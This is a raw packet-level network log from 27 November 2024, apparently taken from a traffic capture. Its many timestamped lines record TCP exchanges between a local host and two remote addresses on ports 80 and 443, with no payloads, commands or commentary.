                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.713455915 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.713526011 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.713602066 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.714123964 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.714175940 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.714175940 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.715013981 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.715110064 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.715137005 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.715828896 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.716041088 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.716084003 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.716871023 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.716929913 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.717056036 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.717879057 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.717986107 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.718003988 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.718692064 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.718781948 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.718821049 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.719436884 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.719491005 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.719522953 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.720134020 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.720191956 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.720223904 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.721024036 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.721086979 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.721159935 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.721724033 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.721826077 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.721888065 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.722496986 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.722548962 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.722592115 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.723198891 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.723280907 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.723356962 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.723869085 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.723936081 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.723958969 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.724714994 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.724775076 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.724854946 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.725589037 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.725650072 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.725671053 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.726486921 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.726499081 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.726587057 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.814722061 CET4434979713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.815346003 CET49797443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.815367937 CET4434979713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.815817118 CET49797443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.815823078 CET4434979713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.871455908 CET4434979613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.871525049 CET4434979613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.871773958 CET49796443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.871817112 CET49796443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.871840000 CET4434979613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.871850967 CET49796443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.871857882 CET4434979613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.876243114 CET49801443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.876306057 CET4434980113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.876394987 CET49801443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.876616955 CET49801443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.876630068 CET4434980113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.882880926 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.882950068 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.883125067 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.883280993 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.883338928 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.883460045 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.884171963 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.884330034 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.884386063 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.885128975 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.885215998 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.885344982 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.886127949 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.886250019 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.886315107 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.887160063 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.887204885 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.888143063 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.888200045 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.888269901 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.889153004 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.889214039 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.889225960 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.889453888 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.890086889 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.890207052 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.890254974 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.890917063 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.891138077 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.891875982 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.891944885 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.892024994 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.892122030 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.892749071 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.892859936 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.892906904 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.894283056 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.894381046 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.894539118 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.895030975 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.895153999 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.895200014 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.896292925 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.896436930 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.896497965 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.897217035 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.897607088 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.897779942 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.898175001 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.898277998 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.898405075 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.898915052 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.899034977 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.899115086 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.899785042 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.899817944 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.899866104 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.900729895 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.900801897 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.900913954 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.901798010 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.901880026 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.901992083 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.902576923 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.902621031 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.902692080 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.903218031 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.903269053 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.903316021 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.903964996 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.904088974 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.904145002 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.904905081 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.905132055 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.905636072 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.905705929 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.905735016 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.906088114 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.906249046 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.906332970 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.906397104 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.906982899 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.907011986 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.907088995 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.907586098 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.907634974 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.908004999 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.908224106 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.908360958 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.908418894 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.909054995 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.909184933 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.910041094 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.910341024 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.910417080 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.910530090 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.911307096 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.911648989 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.911844015 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.912563086 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.912633896 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.912694931 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.913297892 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.913420916 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.913470984 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.914097071 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.914148092 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.914207935 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.914906979 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.915014029 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.915060997 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.915731907 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.915846109 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.915983915 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.916464090 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.916662931 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.916714907 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.917531013 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.917682886 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.917773962 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.918389082 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.918627977 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.918721914 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.919328928 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.919456959 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.919516087 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.920331001 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.920464993 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.920511961 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.921540022 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.921681881 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.921873093 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.922523975 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.922597885 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.922770023 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.923244953 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.923382998 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.923438072 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.924124956 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.924238920 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.924312115 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.924937963 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.924981117 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.925039053 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.925748110 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.925803900 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.925895929 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.926666975 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.926995993 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.927040100 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.928081036 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.928252935 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.928308964 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.929953098 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.930000067 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.930043936 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.930591106 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.930749893 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.930979013 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.931358099 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.982295036 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.005418062 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.065253019 CET4434979813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.065862894 CET49798443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.065884113 CET4434979813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.066337109 CET49798443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.066343069 CET4434979813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.084199905 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.084279060 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.084316969 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.084414959 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.084433079 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.084738016 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.085325003 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.085460901 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.086216927 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.086517096 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.086836100 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.087002039 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.087096930 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.087124109 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.087968111 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.088025093 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.088202953 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.088202953 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.088757038 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.088820934 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.088862896 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.089556932 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.089670897 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.090348005 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.090574980 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.090737104 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.091092110 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.091378927 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.091461897 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.091598988 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.092168093 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.092361927 CET8049792185.215.113.16192.168.2.10
